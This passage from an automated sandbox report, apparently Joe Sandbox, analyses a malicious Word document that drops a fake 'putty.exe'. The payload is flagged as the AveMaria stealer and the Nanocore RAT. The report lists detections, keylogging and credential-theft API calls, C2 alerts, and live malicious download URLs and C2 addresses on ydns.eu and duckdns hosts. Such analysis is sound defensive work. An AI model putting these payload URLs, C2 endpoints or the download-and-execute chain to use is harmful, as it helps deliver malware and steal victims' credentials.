Source: Yara match; File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Machine Learning detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\images.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJoe Sandbox ML: detected
        Source: 21.2.images.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 15.2.putty.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpackAvira: Label: TR/Dropper.Gen
        Source: 34.2.iBCrDCK.i.exe.440000.4.unpackAvira: Label: TR/NanoCore.fadte
        Source: 13.2.putty.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A8C3 lstrlenA,CryptStringToBinaryA,lstrcpyA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C261 CryptUnprotectData,LocalAlloc,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C3B9 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C419 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409D97 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

        Software Vulnerabilities:

        Document exploit detected (creates forbidden files)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Document exploit detected (drops PE files)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: putty[1].exe.0.dr
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: C:\ProgramData\images.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
        Source: global traffic | DNS query: name: newhosteeeee.ydns.eu
        Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
        Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

        Networking:

        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 203.159.80.186:8234
        Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 203.159.80.186:8234
        Uses dynamic DNS services
        Source: unknown | DNS query: name: hhjhtggfr.duckdns.org
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 203.159.80.186:6703
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:54 GMTContent-Length: 731648
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648
        Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 09:00:29 GMTContent-Length: 1378816
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: unknown | DNS traffic detected: queries for: newhosteeeee.ydns.eu
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp | String found in binary or memory: httP://newhosteeeee.ydns.eu/p
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | String found in binary or memory: httP://newhosteeeee.ydns.eu/putt
        Source: powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmp | String found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | String found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exePE
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | String found in binary or memory: http://ja.com/
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | String found in binary or memory: http://java.co
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmp | String found in binary or memory: http://newhosteeeee.ydns.eu
        Source: powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | String found in binary or memory: http://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: putty.exe, 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, putty.exe, 0000000B.00000002.2117025453.0000000000102000.00000020.00020000.sdmp | String found in binary or memory: https://antizapret.prostovpn.org/domains-export.txt.GDPI
        Source: putty.exe, images.exe | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        Installs a global keyboard hook
        Source: C:\ProgramData\images.exe | Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp | Binary or memory string: GetRawInputData

        E-Banking Fraud:

        Yara detected AveMaria stealer
        Source: Yara match | File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RAT
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
